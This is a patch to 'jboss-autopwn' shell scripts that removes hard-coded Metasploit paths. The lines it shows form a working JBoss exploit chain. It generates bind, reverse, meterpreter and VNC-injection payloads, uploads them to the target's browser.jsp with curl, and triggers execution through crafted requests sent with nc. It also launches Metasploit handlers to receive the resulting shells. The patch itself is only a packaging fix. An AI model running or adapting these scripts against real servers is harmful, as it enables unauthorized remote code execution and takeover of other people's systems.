Removed the hard-coded paths to Metasploit
Index: jboss-autopwn/e.sh
===================================================================
--- jboss-autopwn.orig/e.sh
+++ jboss-autopwn/e.sh
@@ -56,7 +56,7 @@ if [ $shell == "bind" ]
 then
 printf "[!] On which port would you like the bindshell to listen on? "
 read port
-framework3/msfpayload cmd/unix/bind_perl LPORT=$port R >payload 
+msfpayload cmd/unix/bind_perl LPORT=$port R >payload 
 printf "[x] Uploading bind shell payload..\n"
 curl -F "dir=/tmp" -F "sort=1" -F "name=MyFile" -F "filename=@payload" -F "Submit=Upload" http://$1:$2/browser/browser/browser.jsp 1>/dev/null 2>/dev/null
 printf "[x] Verifying if upload was successful...\n"
@@ -80,7 +80,7 @@ then
 myip=`ifconfig -a | grep -i "inet" | cut -d: -f2 | awk '{print $1}' | head -n1`
 printf "[!] On which port would you like to accept the reverse shell on? "
 read port
-framework3/msfpayload cmd/unix/reverse_perl LHOST=$myip LPORT=$port R >payload 
+msfpayload cmd/unix/reverse_perl LHOST=$myip LPORT=$port R >payload 
 printf "[x] Uploading reverse shell payload..\n"
 curl -F "dir=/tmp" -F "sort=1" -F "name=MyFile" -F "filename=@payload" -F "Submit=Upload" http://$1:$2/browser/browser/browser.jsp 1>/dev/null 2>/dev/null
 printf "[x] Verifying if upload was successful...\n"
Index: jboss-autopwn/e2.sh
===================================================================
--- jboss-autopwn.orig/e2.sh
+++ jboss-autopwn/e2.sh
@@ -55,7 +55,7 @@ if [ $shell == "bind" ]
 then
 printf "[x] On which port would you like your bindshell to listen? "
 read port
-framework3/msfpayload windows/shell_bind_tcp LPORT=$port X >payload.exe 
+msfpayload windows/shell_bind_tcp LPORT=$port X >payload.exe 
 printf "[x] Uploading bindshell payload..\n"
 curl -F "dir=c:\\" -F "sort=1" -F "name=MyFile" -F "filename=@payload.exe" -F "Submit=Upload" http://$1:$2/browserwin/browser/Browser.jsp 1>/dev/null 2>/dev/null
 rm -rf payload.exe
@@ -73,7 +73,7 @@ printf "[x] Now executing bind shell...\
 sed "s/hostx/$1/g" execute/req1.win | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/c:\\\\payload.exe/g" | sed -e "s/46/60/g" | nc $1 $2 1>/dev/null 2>/dev/null  
 printf "[x] Executed bindshell!\n"
 printf "[x] Reverting to metasploit....\n"
-framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell_bind_tcp LPORT=$port RHOST=$1 E 
+msfcli exploit/multi/handler PAYLOAD=windows/shell_bind_tcp LPORT=$port RHOST=$1 E 
 fi
 fi
 
@@ -82,7 +82,7 @@ then
 myip=`ifconfig -a | grep -i "inet" | cut -d: -f2 | awk '{print $1}' | head -n1`
 printf "[x] On which port would you like to accept your reverse shell? "
 read port
-framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=$myip LPORT=$port X >payload.exe
+msfpayload windows/meterpreter/reverse_tcp LHOST=$myip LPORT=$port X >payload.exe
 printf "[x] Uploading reverseshell payload..\n"
 curl -F "dir=c:\\" -F "sort=1" -F "name=MyFile" -F "filename=@payload.exe" -F "Submit=Upload" http://$1:$2/browserwin/browser/Browser.jsp 1>/dev/null 2>/dev/null
 rm -rf payload.exe
@@ -97,7 +97,7 @@ printf "[!] Reverse shell failed\n"
 else
 printf "[x] Reverse shell uploaded: $J\n"
 printf "[x] You now have 20 seconds to launch metasploit before I send a reverse shell back.. ctrl-z, bg then type:\n"
-printf "framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$myip LPORT=$port E\n"
+printf "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$myip LPORT=$port E\n"
 sleep 20
 printf "[x] Now executing reverse shell...\n"
 sed "s/hostx/$1/g" execute/req1.win | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/c:\\\\payload.exe/g" | sed -e "s/46/60/g" | nc $1 $2 1>/dev/null 2>/dev/null
@@ -111,7 +111,7 @@ if [ $shell == "vnc" ]
 then
 printf "[x] On which port would you like your  vnc shell to listen? "
 read port
-framework3/msfpayload windows/vncinject/bind_tcp LPORT=$port X >payload.exe
+msfpayload windows/vncinject/bind_tcp LPORT=$port X >payload.exe
 printf "[x] Uploading vnc  shell payload..\n"
 curl -F "dir=c:\\" -F "sort=1" -F "name=MyFile" -F "filename=@payload.exe" -F "Submit=Upload" http://$1:$2/browserwin/browser/Browser.jsp 1>/dev/null 2>/dev/null
 rm -rf payload.exe
@@ -129,7 +129,7 @@ printf "[x] Now executing vnc  shell...\
 sed "s/hostx/$1/g" execute/req1.win | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/c:\\\\payload.exe/g" | sed -e "s/46/60/g" | nc $1 $2 1>/dev/null 2>/dev/null
 printf "[x] Executed  vnc shell!\n"
 printf "[x] Reverting to metasploit....\n"
-framework3/msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=$port RHOST=$1 DisableCourtesyShell=TRUE E
+msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=$port RHOST=$1 DisableCourtesyShell=TRUE E
 fi
 fi
 
